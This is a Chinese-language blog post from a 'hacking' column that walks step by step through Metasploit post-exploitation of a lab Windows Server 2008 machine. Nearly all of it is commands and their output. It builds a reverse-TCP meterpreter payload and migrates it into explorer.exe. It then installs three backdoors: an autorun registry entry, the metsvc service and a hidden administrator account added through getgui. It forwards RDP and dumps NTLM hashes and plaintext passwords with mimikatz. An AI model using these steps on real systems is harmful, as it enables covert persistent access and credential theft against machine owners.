Metasploit backdoor

最新推荐文章于 2021-11-18 10:43:39 发布

dy0nGu1

最新推荐文章于 2021-11-18 10:43:39 发布

阅读量817

点赞数

分类专栏： hacking

hacking 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

攻击端:
OS:Kali
IP:192.168.111.129

被害端:
OS:Windows server 2008 (64位)
IP:192.168.111.133

首先在Kali上生成meterpreter的payload

root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe Created by msfpayload (http://www.metasploit.com) . Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}

接下来是配置监听

root@Kali:~# msfconsole msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.111.129 LHOST => 192.168.111.129 msf exploit(handler) > set LPORT 2013 LPORT => 2013 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.111.129:2013 [*] Starting the payload handler...

然后在Windows2008上执行file.exe
返回一个meterpreter

[*] Sending stage (769024 bytes) to 192.168.111.133 [*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800 meterpreter >

主题开始
(1).转移meterpreter到其他进程
在渗透过程中由于各种原因，当前meterpreter进程很容易被干掉，将meterpreter转移到系统常驻进程是个好主意

meterpreter > getuid //查看当前权限 Server username: WIN-K30V5SI0PCEAdministrator meterpreter > ps //列出当前进程 Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowsexplorer.exe 2204 2428 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 2332 2044 file.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersAdministratorDesktopfile.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe meterpreter > migrate 2044 //迁移到PID为2044的explorer进程 [*] Migrating from 2332 to 2044... [*] Migration completed successfully. meterpreter >

验证

meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32Dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsExplorer.EXE 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe

如上所示file.exe进程已经没了。需要注意的是如果存在杀软的话可能会阻止进程注入
(2).测试是不是虚拟机

meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter >

我的2008是装在VMWare上的
(3).安装后门
方法一:persistence方法

meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -L <opt> Location in target host where to write payload to, if none %TEMP% will be used. -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T <opt> Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i <opt> The interval in seconds between each connection attempt -p <opt> The port on the remote host where Metasploit is listening -r <opt> The IP of the system running Metasploit listening for the connect back meterpreter >

执行

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241 [*] Persistent agent script is 148439 bytes long [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [+] Agent executed with PID 2916 [*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ [+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ meterpreter >

现在退出服务器
重新配置监听器

msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.111.129 LHOST => 192.168.111.129 msf exploit(handler) > set LPORT 2241 LPORT => 2241 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.111.129:2241 [*] Starting the payload handler... [*] Sending stage (769024 bytes) to 192.168.111.133 [*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800 meterpreter >

如图，反弹成功，这个被动型的后门在某些特殊的场合会是个不错的选择
方法二:metsvc

meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:UsersADMINI~1AppDataLocalTempHzWbqqRpuBlxn... [*] >> Uploading metsrv.x86.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter >

metsvc后门安装成功，接下来是连接

root@Kali:~# msfconsole , , / ((__---,,,---__)) (_) O O (_)_________ _ / | o_o M S F | _____ | * ||| WW||| ||| ||| Using notepad to track pentests? Have Metasploit Pro report on hosts, services, sessions and evidence -- type 'go_pro' to launch it now. =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0] + -- --=[ 1239 exploits - 755 auxiliary - 207 post + -- --=[ 324 payloads - 31 encoders - 8 nops msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set RHOST 192.168.111.133 RHOST => 192.168.111.133 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800 meterpreter >

方法三:
这个是类似于添加账户3389远程连接

meterpreter > run getgui -u zero -p haizeiwang123_ [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Setting user account for logon [*] Adding User: zero with Password: haizeiwang123_ [*] Hiding user from Windows Login screen [*] Adding User: zero to local group 'Remote Desktop Users' [*] Adding User: zero to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc meterpreter >

(4).端口转发
主机处于内网也是比较常见的,metasploit自带了一个端口转发工具

meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to. meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133 [-] You must supply a local port, remote host, and remote port. meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133 [*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter >

接下来运行

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

即可连接
(5).获取密码
法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块
首先加载mimikatz模块
由于我的Windows 2008是64位的，所以先要转移到64位进程

meterpreter > ps ...... 2000 472 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCEzero C:Windowsexplorer.exe 2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCEzero C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe 2780 2256 winlogon.exe x86_64 2 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCEzero C:WindowsSystem32dwm.exe meterpreter > migrate 2780 [*] Removing existing TCP relays... [*] Successfully stopped TCP relay on 0.0.0.0:1234 [*] 1 TCP relay(s) removed. [*] Migrating from 1428 to 2264... [*] Migration completed successfully. [*] Recreating TCP relay(s)... [*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter >

获取密码哈希

meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be } 0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO) 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO) 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;47971 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)

获取明文密码

meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ 0;47971 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;995 Negotiate NT AUTHORITY IUSR 0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_ 0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_ 0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_